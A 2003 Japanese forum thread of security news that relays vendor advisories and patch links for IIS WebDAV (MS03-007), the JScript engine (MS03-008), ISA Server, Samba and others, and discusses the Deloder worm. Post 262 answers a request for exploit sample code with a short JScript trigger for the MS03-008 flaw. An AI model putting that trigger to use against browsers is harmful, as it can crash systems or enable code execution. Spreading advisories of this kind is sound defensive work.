読み込ませるとポインタの配列境界越えが発生し、任意のコードを実行できる危険性があります。
DeleGate 8.3.4 (UNIX)
DeleGate 8.4.0 (Windows)
において、問題を確認し、最新の8.5.0にアップグレードすることで脆弱性を回避できます。

http://www.lac.co.jp/security/intelligence/SNSAdvisory/63.html
http://www.delegate.org/delegate/
197名無しさん@お腹いっぱい。:03/03/10 23:39 ID:2cCQbOjM
198名無しさん@お腹いっぱい。:03/03/11 00:06 ID:j6QBxmX9
>>194

もろに感染〜。
devldr32.exe消してもすぐ復活するし破壊活動ないようだし
ウイルス対策ソフトもないし傍観するしかないや…。
レジストリ開いても削除できそうなキーもないし…。

しょんぼり。
199窓板住人 ◆winDOwS0aE :03/03/11 00:34 ID:???
>>198 遠隔操作の危険があるので対処はされた方がよいかと思います。
WinVNCを削除してないから遠隔で再導入されているのかも。あるいはPort445
を閉鎖してない、かつAdministratorのパスワードが破られているため再び感染する
のが原因ではないかと思います。

ああ、すみません、>>194の時はよく見てなかったのですが、
WORM_DELODER.Aに感染すると、BKDR_DELODER.Aにも感染するようですね。
BKDR_DELODER.Aに感染するとWinVNCが導入される、と。
両方のページを参照して確認されることを推奨します。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_DELODER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_DELODER.A
また、WORM_DELODER.Aに関しては上記ページで駆除ツールも配布されているようです。
200名無しさん@お腹いっぱい。:03/03/11 01:03 ID:???
>>198
Dvldr32.exe
devldr32.exe
201名無しさん@お腹いっぱい。:03/03/11 03:34 ID:???
>>194
素人なんでまったくワケワカメだけど、ガクブルって感じぃ〜
202名無しさん@お腹いっぱい。:03/03/11 04:18 ID:NCOFge+C
おまえらついにC#死滅スレがPart11になりましたよ

C#って死滅しちゃうの??? part11
http://pc2.2ch.net/test/read.cgi/tech/1047322829/

C#は新言語でありながらさまざまなセキュリティの欠陥が存在する。
そんな言語がWindowsの将来を担っていけるのか?
203名無しさん@お腹いっぱい。:03/03/11 05:10 ID:???
なんか、IBMサイトのFTPディレクトリが丸見えなんでつけど……。
掘っていったら面白そうだ…。


http://www-6.ibm.com/jp/aspc/list/personal.html#hpbld

これ丸見え↓
ftp://ftp.jp.ibm.com/pub/aspc/fixpak/personsw/hmpgbld/v65/hpb652f
204窓板住人 ◆winDOwS0aE :03/03/11 05:15 ID:???
>>203 適切な設定と運用が施されていれば問題はないはずですよ
Anonymousでファイルアップロードできたりしたら問題ですがね(苦笑)
205名無しさん@お腹いっぱい。:03/03/11 05:19 ID:???
IBMの丸見えディレクトリ↓ですが、ftpのせいか、直リンだとダメみたい…。
コピペでおながいします。
ftp://ftp.jp.ibm.com/pub/aspc/fixpak/personsw/hmpgbld/v65/hpb652f
206むむむ ◆MUMUMUkopk :03/03/11 15:09 ID:???
■Ethereal 0.9.9 に脆弱性、0.9.10 へのアップグレードを

http://www.ethereal.com/appnotes/enpa-sa-00008.html
207あぼーん:あぼーん
あぼーん
208名無しさん@お腹いっぱい。:03/03/11 15:54 ID:???
203はVectorのftpも面白がってるんだろうか
209名無しさん@お腹いっぱい。:03/03/11 16:09 ID:???
「ftp丸見え」ごときで喜ぶなよ。
index.htmlなどがなくて、
ディレクトリの内容が丸見えでも喜ぶ<人種>だろうか(w

雑談スマン
210むむむ ◆MUMUMUkopk :03/03/11 16:34 ID:???
>>206
Etherrealは0.9.11が出ている模様(0.9.10はパッケージの不具合があったとのこと)。
ftp://ftp.ethereal.com/pub/ethereal/ethereal-0.9.11.tar.gz
211むむむ ◆MUMUMUkopk :03/03/11 16:35 ID:???
>>210
おっと、rが一つ多かった。
212窓板住人 ◆winDOwS0aE :03/03/11 23:26 ID:???
某有名セキュリティ関係MLからの転載ですが、(以下そのまま引用)

非接触型ICカード「FeliCa」を使用したサービスであるビットワレットの
「Edy」や、ソニーファイナンスの「eLIO」カードのユーザが、PCからこれら
を利用するために使用する、USB接続のICカードリーダ/ライタ「PaSoRi」に付
属するソフトウェアパッケージ「FeliCa Secure Client」について、それが同
時にインストールするローカルHTTPサーバプログラムである「FeliCa Offline
Viewer」にクロスサイトスクリプティング脆弱性があり、FeliCa Offline
Viewerで閲覧できるようになっている情報(最後にPaSoRiで決済や入金をした
際のデバッグ用ログファイル)が、インターネット上の悪意あるサイトに仕掛
けられた罠のリンクを踏むことによって盗まれる可能性があり、また、
localhostへアクセスさせられることによって生ずる[memo:5410]の「脅威1」
と同等の危険性が存在します。

ということだそうです。3月3日以降、HTTPサーバプログラムそのものを削除した
ドライバを公表し、脆弱性を回避した模様です。詳しくは以下を参照してください。
http://memo.st.ryukoku.ac.jp/archive/200303.month/5560.html
213test:03/03/13 03:04 ID:KckR5zs0
214山崎渉:03/03/13 14:05 ID:???
(^^)
215名無しさん@お腹いっぱい。:03/03/14 00:06 ID:fxIjsYOS
一応揚げ
216窓板住人 ◆winDOwS0aE :03/03/14 13:25 ID:???
http://news2.2ch.net/test/read.cgi/newsplus/1045132076/258 からの情報です。

IBM Lotus Notes/Domino に3つの深刻な脆弱性が発見されました。
DoS攻撃を受ける可能性及び完全なリモート制御を可能にする問題があるようです。
最新版Notes R5.0.12にアップデートしてください。
http://www.zdnet.co.jp/news/0303/13/nebt_19.html
http://www.rapid7.com/advisories/R7-0010-info.html
217窓板住人 ◆winDOwS0aE :03/03/16 03:00 ID:???
話題がまたそれますが、
Q319170を適用するとシャットダウンが遅くなる問題に関しての対応かと思われる
情報がKnowledge Baseに掲載されました。

マイクロソフト サポート技術情報 - 814770
ドメインからのログオフ完了に時間がかかる
http://support.microsoft.com/default.aspx?scid=kb;ja;814770

治るかどうかは分かりませんが、参考まで。
218窓板住人 ◆winDOwS0aE :03/03/16 05:12 ID:???
Q329170ですた。トホホ・・・
219むむむ ◆MUMUMUkopk :03/03/16 16:47 ID:???
2.2.7aまでのSambaにセキュリティホールが発見されました。
2.2.8に更新しましょう。
http://www.samba.org/samba/whatsnew/samba-2.2.8.html
220名無しさん@お腹いっぱい。:03/03/16 17:13 ID:???
>>203
これコピペですよw
他版でもたまに見かけます。
pub/となっているものはたいがい公開している
ftpサーバーです。


>>217
この問題は一般ユーザーにはほとんど関係ないですね。
自宅でNTもしくは2000サーバーを組んでいて
かつドメインを構築している方のみが対象となります。
221名無しさん@お腹いっぱい。:03/03/17 15:08 ID:Qr1bV8iV
>>186
この件についてM$が正式にアナウンスをだしました。

Windows Update で同じ修正プログラムが再度表示される
http://support.microsoft.com/default.aspx?scid=http%3a%2f%2fwww.microsoft.com%2fjapan%2fsupport%2fsokuho%2fArchivedPage.asp%3fSequentialID%3d19

Windows Updateの不具合のようですね。
222むむむ ◆MUMUMUkopk :03/03/18 07:55 ID:???
■Windows2000/IIS 5.0に「緊急」のセキュリティホール

Windows コンポーネントの未チェックのバッファにより
Webサーバーが侵害される(MS03-007)

登録日 :2003/03/18
更新日 :2003/03/18

概要 :
このセキュリティ情報の対象となるユーザー :
Microsoft(R) Windows(R) 2000 をご使用のシステム管理者
脆弱性の影響 : 攻撃者の任意のコードが実行される
最大深刻度 : 緊急
推奨する対応策 :
管理者は、直ちにこの修正プログラムをインストールしてください。

影響を受けるソフトウェア :
・Microsoft Windows 2000
223むむむ ◆MUMUMUkopk :03/03/18 07:56 ID:???
>>222 続き

問題 :
技術的な説明 :
Microsoft Windows 2000 は、World Wide Web (WWW) における分散オーサリング
およびバージョン管理 (WebDAV: World Wide Web Distributed Authoring and
Versioning) プロトコルをサポートしています。 RFC 2518で定義されている
WebDAV はインターネット上でコンピュータの間のファイル管理と編集機能の
標準を提供するハイパーテキスト転送プロトコル (HTTP) の拡張機能です。
セキュリティの脆弱性は、WebDAV が使用する Windows コンポーネントに存在
する未チェックのバッファが原因です。

攻撃者により、Internet Information Server (IIS) が動作するサーバーに
対して、特殊な HTTP 要求を送信されることで脆弱性が悪用されます。この特殊
な要求により、サーバーを停止または攻撃者が指定した操作を行うことが可能で
す。この操作は、IIS の実行ユーザーの権限 (既定では、LocalSystem) で
行われます。

マイクロソフトは、この脆弱性のセキュリティ修正プログラムを提供しており、
可能な限り早く適用することを推奨いたします。修正プログラムの影響を確認
する間の、一時的な回避策と追加のツールも合わせて公開しました。一時的な
回避策とツールについては、よく寄せられる質問の [回避策] のセクションで
説明しています。

問題を緩和する要素 :
・IIS Lockdown Wizard tool と共に提供される URLScan が既定の設定で使用
されている場合、この脆弱性を悪用する攻撃を防ぐことができます。
・この脆弱性が悪用されるのは、攻撃者が影響を受けるサーバーと Web
セッションを確立できる場合のみです。
224むむむ ◆MUMUMUkopk :03/03/18 07:56 ID:???
>>223 続き

深刻度 :
Windows 2000 緊急
上記の評価はこの脆弱性の影響を受けるシステムの種類、システムの典型的な
展開形式およびこの脆弱性がシステムに及ぼす影響に基づいています。

脆弱性識別番号 : CAN-2003-0109

テストしたバージョン :
マイクロソフトは Windows NT 4.0、Windows 2000 および Windows XP のテスト
を行い、この脆弱性による影響を評価しました。それ以前のバージョンに関して
はサポートの対象となっていないため、この脆弱性による影響は不明です。

修正プログラム :
Microsoft Windows 2000:
この問題に対する日本語版修正プログラムは、次のサイトからダウンロード
できます。

・すべての言語 (NEC PC-9800 シリーズを除く)
(WU)
http://www.microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=ja

・NEC PC-9800 シリーズ
(WU)
http://www.microsoft.com/downloads/details.aspx?FamilyID=fbcf9847-d3d6-4493-8dcf-9ba29263c49f&DisplayLang=ja

(WU)このマークの付いている修正プログラムは Windows Update から
インストールすることもできます。
225むむむ ◆MUMUMUkopk :03/03/18 07:57 ID:???
>>224 続き

修正プログラムに関する追加情報 :
対象プラットフォーム :
この修正プログラムは、Windows 2000 Service Pack 2 または Service Pack 3
を実行しているシステムにインストールすることができます。

この修正を含む予定のサービス パック :
この問題に対する修正プログラムは Windows 2000 Service Pack 4 に含まれる
予定です。

再起動の必要性 : あり
修正プログラムのアンインストール : 可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたかどうか確認する方法 :
・この修正プログラムがマシンにインストールされたことを確認するためには、
マシンに次のレジストリ キーが作成されたことを確認して下さい。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP4\Q815021

各ファイルを確認するためには、次のレジストリ キーで、日付、時間そして
バージョン情報を参照して下さい。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP4\Q815021\Filelist
226名無しさん@お腹いっぱい。:03/03/18 09:01 ID:Gm04Oi6/
2か?
227窓板住人 ◆winDOwS0aE :03/03/19 01:12 ID:???
>>222-225 に関して、MSDN周りからも情報が来てますので掲載します。

◇[マイクロソフト セキュリティ情報]━━━━━━━━━━━━━━━━━━
************************************
Windows 2000 にて Internet Information Services 5.0 をお使いのお客様へ
************************************
マイクロソフト製品をご利用になっているお客様へセキュリティに関する重要な
お知らせです。

■「MS03-007 : Windows コンポーネントの未チェックのバッファにより Web
サーバーが侵害される」という問題に関して、マイクロソフトはセキュリティ修正
プログラムの提供を開始しました。本セキュリティ上の脆弱性は、Internet
Information Services 5.0 に含まれる Web DAV 機能に対して、不正な要求
データを送る事により発生する事が確認されております。弊社では、本脆弱性への
対処を行うセキュリティ修正プログラム及び、回避が可能となるセキュリティツー
ルの開発を行いました。また、これらに対する詳細な日本語資料を作成し、弊社
Web サイトにて公開を開始しております。ぜひご確認いただき、適切な対処を行
ってくださいますよう、お願いいたします。
228窓板住人 ◆winDOwS0aE :03/03/19 01:13 ID:???
今回公開しましたセキュリティ修正プログラムは、Windows 2000 Service Pack 2
以降の環境に適用を行うことが可能です。お客様の環境におきまして Service
Pack 2 以降を適用されていない場合、可能な限り Service Pack 3 を適用した後
に、当修正プロラムを適用いただきますようお願いいたします。
○詳しくは、下記のサイトで提供している情報をご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp

■マイクロソフト セキュリティ情報 (MS03-007) : よく寄せられる質問
マイクロソフトは、可能な限り早くセキュリティ修正プログラムを適用すること
を強く推奨いたしますが、適用までの間この脆弱性を悪用するための WebDAV の
要求を防ぐためのいくつかのの回避策があります。合わせて、マイクロソフトは
容易にこれらの回避策を実施するためのツールとドキュメントを提供しています。
http://www.microsoft.com/japan/technet/security/bulletin/fq03-007.asp
229窓板住人 ◆winDOwS0aE :03/03/19 07:06 ID:???
あまり同じネタでスレを消費したくはないのですが、
MS03-007の脆弱性に関して、すでにこの脆弱性を利用した攻撃が行われているため、
関係者は早急な対処が必要です。patchをテストしている間、脆弱性を回避する方法も
提供されています。patchはWindows Updateから現在の所、入手することは出来ません
(指定URLからダウンロード)。事態は急を要しているため、すでにCERT/CC、JPCERT/CC、
警察庁などからもすでに情報が出てます。ご注意下さい。

セキュリティホールmemo :
■ Windows コンポーネントの未チェックのバッファにより Web サーバーが侵害される (MS03-007)
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/03.html#20030318_ms03-007
CERT Advisory CA-2003-09 Buffer Overflow in Microsoft IIS 5.0
http://www.cert.org/advisories/CA-2003-09.html
LAC 邦訳版: http://www.lac.co.jp/security/intelligence/CERT/CA-2003_09.html
JPCERT/CC Alert 2003-03-18 Microsoft IIS 5.0 の脆弱性に関する注意喚起
http://www.jpcert.or.jp/at/2003/at030003.txt
警察庁:マイクロソフト社Windows2000上で動作するInternet Information Server (IIS) 5.0の脆弱性について
http://www.cyberpolice.go.jp/important/20030318_155635.html
ZDNN Windows 2000に「被害報告あり」のセキュリティホール
http://www.zdnet.co.jp/news/0303/18/ne00_win2000.html
230窓板住人 ◆winDOwS0aE :03/03/19 07:19 ID:???
http://internet.watch.impress.co.jp/www/article/2003/0318/grouch.htm

5月9日にハードディスクを破壊するウイルス「GROUCH」

トレンドマイクロ株式会社は、5月9日にハードディスクを破壊するVBScript型
ウイルス「VBS_GROUCH.A」を警告した。危険度は「低」だが、破壊力と感染力は
「高」になっている。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_GROUCH.A
231名無しさん@お腹いっぱい。:03/03/19 08:19 ID:4rFTVqKV
>>302
同意
小泉はおかれている立場(>>299)がしょうがないとして、
ブッシュがおかしすぎるんだよな。
232ニュー速+住人:03/03/19 08:19 ID:???
誤爆スマソ
233窓板住人 ◆winDOwS0aE :03/03/19 18:32 ID:???
>>222-225の「重要な」追加情報です。必ずこのレスだけではなくURLリンク先も参照してください。
----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp
----------------------------------------------------------------
Windows コンポーネントの未チェックのバッファにより Web サーバーが侵害される (MS03-007)
(略)

警告 :
Windows 2000 Service Pack 2 を実行している場合、この更新をインストール
する前にシステムの ntoskrnl.exe のバージョンをチェックして下さい。
システムの ntoskrnl.exe のバージョンを確認するためには、次のステップを
行って下さい。

1. %windir%\system32 ディレクトリを参照します。
2. ntoskrnl.exe を右クリックします。
3. [プロパティ] をクリックします。
バージョン情報は [バージョン] タブに表示されています。

5.0.2195.4797 から 5.0.2195.4928 (5.0.2195.4928 を含む) までの
ntoskrnl.exe のバージョンはこの修正プログラムとの互換性がありません。
これらのバージョンはプロダクト サポート サービスの修正プログラムのみで
配布されたバージョンです。(Windows Update やマイクロソフトの Web サイト
からダウンロード可能な修正プログラムではありません。)
234窓板住人 ◆winDOwS0aE :03/03/19 18:32 ID:???
この問題に対する修正プログラムが、ntoskrnl.exe のこれらのいずれかの
バージョンが存在するシステムにインストールされる場合、最初の再起動に
コンピュータでエラーが発生し、Stop 0x00000071 メッセージが表示されます。
このため、Windows 2000 回復コンソールを使用して
“\winnt\$NTUninstallQ815021$” ディレクトリに保存されている ntdll.dll
のバックアップ コピーを回復する必要があります。

プロダクト サポート サービスから配布された ntoskrnl.exe のバージョンが
存在するシステムを更新するためには、この修正プログラムを適用する前に
プロダクト サポート サービスにご連絡ください。プロダクト サポート
サービスへの連絡に関する情報は次の Web サイトをご覧下さい。
http://support.microsoft.com

または、この問題に対する修正プログラムをインストールする前に、Service
Pack 3 にアップグレードすることもできます。
235名無しさん@お腹いっぱい。:03/03/20 10:47 ID:esR+FAtl
236名無しさん@お腹いっぱい。:03/03/20 11:03 ID:eXRQugYD
MS03-008のサンプルコードキボンヌ
237 :03/03/20 12:03 ID:???
238 :03/03/20 12:46 ID:lhMtnvl6
>>235
同じくきぼんぬ
239名無しさん@お腹いっぱい。:03/03/20 13:16 ID:???

★すべてのユーザーはWindows Updateの実施を★

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030320/1/

240名無しさん@お腹いっぱい。:03/03/20 13:24 ID:???
>>237
アリガト。でもそこで見つからなかったのでカキコした次第でつ。
241窓板住人 ◆winDOwS0aE :03/03/20 16:59 ID:???
遅れて申し訳ありません。MS03-008及びMS03-009に関する情報です。
242窓板住人 ◆winDOwS0aE :03/03/20 17:07 ID:???
----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-008.asp
----------------------------------------------------------------
Windows スクリプト エンジンの問題により、コードが実行される (814078) (MS03-008)

登録日 : 2003/3/20 更新日 : 2003/3/20
概要 :
このセキュリティ情報の対象となるユーザー : Microsoft Windows をご使用のお客様
脆弱性の影響 : 攻撃者の任意のコードが実行される
最大深刻度 : 緊急
推奨する対応策 : お客様は、直ちにこの修正プログラムをインストールしてください。
影響を受けるソフトウェア :
Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows Me
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Server Edition
Microsoft Windows 2000
Microsoft Windows XP
243窓板住人 ◆winDOwS0aE :03/03/20 17:07 ID:???
問題 :
技術的な説明 :
Windows スクリプト エンジンは、Windows オペレーティング システムでスクリプト
コードを実行する機能を提供します。スクリプト コードは、Web ページに機能を追加
したり、オペレーティング システムまたはプログラム内でタスクを自動化するために
使用することができます。このコードは、Visual Basic スクリプト (英語情報)、
または JScript (英語情報) など、いくつかの異なるスクリプト言語の形式で記述
することができます。
JScript (英語情報) 用の Windows スクリプト エンジンが、情報を処理する方法に問題
が存在します。攻撃者がこの脆弱性を悪用し、Web ページを作成し、ユーザーが訪問した
際に、ユーザーの権限で攻撃者の任意のコードが実行される可能性があります。そのような
Web ページは Web サイトにホストされるか、または電子メールにて直接ユーザーに送信
される可能性があります。
マイクロソフトは、この脆弱性に対する修正プログラムを提供し、影響を受けるすべての
お客様にその修正プログラムを直ちに適用するように推奨いたします。お客様がその修正
プログラムの影響と互換性のテストを行う際に、この脆弱性が悪用されるのを防ぐために
使用可能な別の予防手段を確認しました。これらの一時的な回避策は、「よく寄せられる
質問」の「回避策」の欄で説明しています。
244窓板住人 ◆winDOwS0aE :03/03/20 17:07 ID:???
問題を緩和する要素 :
攻撃者が攻撃を実行するには、ユーザーが攻撃者の運営する Web サイトを訪問するか、
または攻撃者から送信された HTML 形式の電子メールを受信することが必要条件となります。
Internet Explorer でアクティブ スクリプトを無効に設定したコンピュータには、
この問題の影響はありません。
攻撃者がこの脆弱性を悪用した場合、ユーザーと同じ権限のみが与えられます。システム
上で低い権限を設定されたアカウントを持つユーザーは、管理者権限で実行している
アカウントを持つユーザーよりも危険性は低いと言えます。
この脆弱性を悪用した、HTML 形式の電子メールによる自動化された攻撃は、
Outlook Express 6 または Outlook 2002 を既定の構成で使用するか、または Outlook
電子メール セキュリティ アップデートをインストールした Outlook 98 または 2000 を
使用することによって阻止することができます。

深刻度 : 上記の対象となる全てのバージョンにおいて緊急
上記の評価はこの脆弱性の影響を受けるシステムの種類、システムの典型的な展開形式
およびこの脆弱性がシステムに及ぼす影響に基づいています。
脆弱性識別番号 : CAN-2003-0010
245窓板住人 ◆winDOwS0aE :03/03/20 17:08 ID:???
テストしたバージョン :
マイクロソフトは Windows 98、Windows 98 Second Edition、Windows Me、Windows NT 4.0、
Windows NT 4.0 Terminal Server Edition、Windows 2000、Windows XP のテストを行い、
この脆弱性による影響を評価しました。それ以前のバージョンに関してはサポートの対象
となっていないため、この脆弱性による影響は不明です。

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。
すべての Windows システム用の修正プログラムは、Windows Update にてダウンロード
することができます。また、以下の修正プログラムを介して、手動で適用することが
できます。また、これらの修正プログラムは、手動でインストールするためにダウン
ロードすることもできます。
Windows 98 および Windows 98 SE:
http://www.microsoft.com/downloads/details.aspx?FamilyID=c6504fd9-5e2c-45bf-9424-55d7c5d2221b&DisplayLang=ja
Windows Me:
http://download.microsoft.com/download/7/7/3/7739a3af-83f7-42f2-85b4-f512bf90d5b9/js56mjp.exe
Windows NT 4.0:
http://www.microsoft.com/downloads/details.aspx?FamilyID=c6504fd9-5e2c-45bf-9424-55d7c5d2221b&DisplayLang=ja
Windows NT 4.0, Terminal Server Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyID=c6504fd9-5e2c-45bf-9424-55d7c5d2221b&DisplayLang=ja
Windows 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyID=824b1bd4-b4d6-49d5-8c58-199bdc731b64&DisplayLang=ja
Windows XP Home Edition および Professional Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyID=824b1bd4-b4d6-49d5-8c58-199bdc731b64&DisplayLang=ja
246窓板住人 ◆winDOwS0aE :03/03/20 17:08 ID:???
修正プログラムに関する追加情報 :
対象プラットフォーム :
Windows 98 用の修正プログラムは Window 98 を実行しているシステムにインストールすることができます。
Windows 98SE 用の修正プログラムは Window 98SE を実行しているシステムにインストールすることができます。
Windows Me 用の修正プログラムは Window Me を実行しているシステムにインストールすることができます。
Windows NT 4.0 用の修正プログラムは Windows NT 4.0 Service Pack 6a を実行している
システムにインストールすることができます。
Windows NT 4.0 Terminal Server Edition 用の修正プログラムは Windows NT 4.0
Terminal Server Edition Service Pack 6 を実行しているシステムにインストール
することができます。
Windows 2000 用の修正プログラムは、Service Pack 2、または Service Pack 3 を
実行しているシステムにインストールすることができます。
Windows XP 用の修正プログラムは Window XP または Windows XP Service Pack 1 を
実行しているシステムにインストールすることができます。
247窓板住人 ◆winDOwS0aE :03/03/20 17:09 ID:???
この修正を含む予定のサービス パック : (略)
再起動の必要性 : あり
修正プログラムのアンインストール : 不可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたかどうか確認する方法 : (略)
警告 : なし

詳細情報 :
よく寄せられる質問 : マイクロソフトセキュリティ情報(MS03-008)
http://www.microsoft.com/japan/technet/security/bulletin/fq03-008.asp
US マイクロソフトセキュリティ情報(MS03-008)
http://www.microsoft.com/technet/security/bulletin/ms03-008.asp
この脆弱性に対するサポート技術情報 (KB) は現在準備中です。
更新履歴 : 2003/3/20: このセキュリティ情報ページを公開しました。
248窓板住人 ◆winDOwS0aE :03/03/20 17:12 ID:???
----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-009.asp
----------------------------------------------------------------
ISA Server DNS アタック検出フィルタの問題により、サービス拒否が起こる
(331065) (MS03-009)

登録日 : 2003/3/20 更新日 : 2003/3/20
概要 : このセキュリティ情報の対象となるユーザー :
Microsoft(R) Internet Security and Acceleration (ISA) Server 2000 を
実行しているシステム管理者
脆弱性の影響 : サービス拒否
最大深刻度 : 警告
推奨する対応策 :
システム管理者は修正プログラムのインストールを検討して下さい。
影響を受けるソフトウェア :
・Microsoft ISA Server
(Microsoft Back Office Server 2000、Microsoft Small Business Server にも
含まれています)
249窓板住人 ◆winDOwS0aE :03/03/20 17:12 ID:???
問題 : 技術的な説明 :
Microsoft Internet Security and Acceleration (ISA) Server 2000 には着信
方向のトラフィックにアプリケーション フィルタを適用する機能があります。
アプリケーション フィルタにより、ISA Server は特定のアプリケーションに
ついて、データ ストリームを分析し、データがファイアウォールを通過する
時のデータの検査、スクリーニング、ブロック、リダイレクトまたは変更などの
アプリケーション特有の処理を提供することができます。このメカニズムは、
攻撃が試行されたことを示す無効な URL や内部のドメイン ネーム サービス
(DNS) サーバーへの攻撃に対する保護を行うために使用されます。
このフィルタには、サーバーに着信する DNS リクエストをスキャンする時、
フィルタが特定の種類のリクエストを適切に処理しない問題が存在します。
この脆弱性は、攻撃者により DNS サーバーを公開している ISA Server
コンピュータに対して不正なリクエストを送ることにより、悪用される可能性が
あります。この攻撃を受けた ISA Serverコンピュータでは、アプリケーション
フィルタ機能が正しく動作しなくなり、これにより DNS サーバーへの要求が
正しく処理されなくなるため、サービス拒否が発生する可能性があります。この
攻撃が行われても、不正な DNS リクエストは ISA Server 上の
ファイアウォールで止められ、内部の DNS サーバーに渡されません。また、
そのほかのすべての ISA Server 機能は影響を受けません。
250窓板住人 ◆winDOwS0aE :03/03/20 17:12 ID:???
問題を緩和する要素 : (略)
深刻度 : ISA Server 警告
脆弱性識別番号 : CVE-CAN-2003-0011
テストしたバージョン : (略)
修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトから
ダウンロードできます。
Microsoft ISA Server:
・日本語版 :
http://microsoft.com/downloads/details.aspx?FamilyId=F62127C5-51E3-4B34-A6D3-B9CF840358BD&displaylang=ja
・英語版 :
http://microsoft.com/downloads/details.aspx?FamilyId=F62127C5-51E3-4B34-A6D3-B9CF840358BD&displaylang=en
(その他の国は略)

修正プログラムに関する追加情報 :
対象プラットフォーム :
この修正プログラムは ISA Server 2000 Service Pack 1 または ISA Server
Feature Pack 1 を実行しているシステムに適用することができます。
251窓板住人 ◆winDOwS0aE :03/03/20 17:12 ID:jXMBq1kf
この修正を含む予定のサービス パック :
この問題に対する修正プログラムは次の ISA Server 用のサービス パックに
含まれる予定です。
再起動の必要性 : なし
修正プログラムのアンインストール : 可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたかどうか確認する方法 : (略)
警告 : なし
他のセキュリティ修正プログラムの入手先 : (略)

詳細情報 :
・よく寄せられる質問 : マイクロソフトセキュリティ情報(MS03-009)
http://www.microsoft.com/japan/technet/security/bulletin/fq03-009.asp
・US マイクロソフトセキュリティ情報(MS03-009)
http://www.microsoft.com/technet/security/bulletin/ms03-009.asp
謝辞 :
この問題を連絡し、顧客の保護に協力して下さった Network Computing
Magazine の Mike Fratto 氏に対し、マイクロソフトは深い謝意を表します。
更新履歴 : 2003/3/20 : このセキュリティ情報ページを公開しました。
252名無しさん@お腹いっぱい。:03/03/20 19:26 ID:???
>>235

に対してどうすれば良いのか

>>152みたいのを作っていただけないでしょうか? 厨ですみません。
253むむむ ◆MUMUMUkopk :03/03/20 20:15 ID:???
■WinbiffV2.0〜V2.42にセキュリティホール、2.42PL2への更新を

Winbiffユーザーの皆様へ重要なお知らせ
http://www.orangesoft.co.jp/Winbiff20/secholl_20030317.html
254窓板住人 ◆winDOwS0aE :03/03/20 22:46 ID:qZr9yaVe
>>252 自分のお使いのバージョンのWindowsに対する修正パッチのリンクが>>245
にありますから、ダウンロードして実行し再起動するだけですが・・・
お使いのWindowsのバージョンを調べるにはスタートメニューから
ファイル名を指定して実行をクリックし"winver"と入力します。

というか、普通にWindows Updateすれば出てくるはずなのですが・・・

>>253 Σ(;´Д`)・・・


(´・ω・`)
255名無しさん@お腹いっぱい。:03/03/20 22:57 ID:???
不要な顔文字はやめておくれ
256名無しさん@お腹いっぱい。:03/03/20 23:15 ID:???
アップデートして再起動したらフリーズした

インターネットと印刷ができなくなったりしている

( ´Д` ) カネカエセ
257窓板住人 ◆winDOwS0aE :03/03/20 23:18 ID:qZr9yaVe
>>255 もろ>>253の対象者だったもので・・・しかも結構重大そうで
信頼に傷が付いたモノですから・・・

>>256 Windows板の各質問スレへどうぞ
258名無しさん@お腹いっぱい。:03/03/20 23:21 ID:???
>>255
細かい事言うなよ( ´∀`)
259名無しさん@お腹いっぱい。:03/03/20 23:48 ID:???
>>255
じゃあ今度から窓板住人さんに変わっておまえがここに書け。
それができないんならくだらんことで文句言うな。

>むむむさん、窓板住人さん
いつもありがとうございます。助かってます。
260名無しさん@お腹いっぱい。:03/03/20 23:50 ID:bqtPHXqf
ちょうど、今、ハングアップしました・・・。
閉じても、閉じても、ヘルプが出てきて・・・仕方がないので再起動です。
261名無しさん@お腹いっぱい。:03/03/20 23:56 ID:rcuqWkbK
>>255
自己責任
>>259
自己責任
262酢満古!!!!!!!!!!!!!!!:03/03/20 23:58 ID:???
>>240
これでどうだ!!!!!!!!!!!!!!!!!!!!!1
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0142.html
<script>
var trigger = [];
i = 1;
do {trigger[i] = 1;} while(i++ < 10000);
trigger[0x3FFFFFFF] = 1;
trigger.sort(new Function("return 1"));
</script>
2635痔:03/03/21 00:00 ID:???
「1」は「!」の間違い。
264名無しさん@お腹いっぱい。:03/03/21 02:42 ID:???
>>259
低脳だから文句に見えるんだね、腰ぎんちゃくクン♪
265ちんたらもさお:03/03/21 03:14 ID:iZ4r2Mtp
★★★★★★★★★★★★★

ここまで読んで対策済み

★★★★★★★★★★★★★
266名無しさん@お腹いっぱい。:03/03/21 08:38 ID:???
>>262は変なスクリプト貼り付けてるな。
テストしてみたらエラー出したし。
267名無しさん@お腹いっぱい。:03/03/21 16:19 ID:???
まぁJavaScriptであると仮定しても
一行目は
trigger = new Array();
だろうな。
268名無しさん@お腹いっぱい。:03/03/22 11:29 ID:CFLr5P48
Windows全バージョンに「緊急」の脆弱性
http://headlines.yahoo.co.jp/hl?a=20030320-00000001-zdn-sci

に、対するパッチがちゃんと当ててあるかどうか確認する方法ってないのでしょうか?
269名無しさん@お腹いっぱい。:03/03/22 12:59 ID:???
>>268
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-008.asp
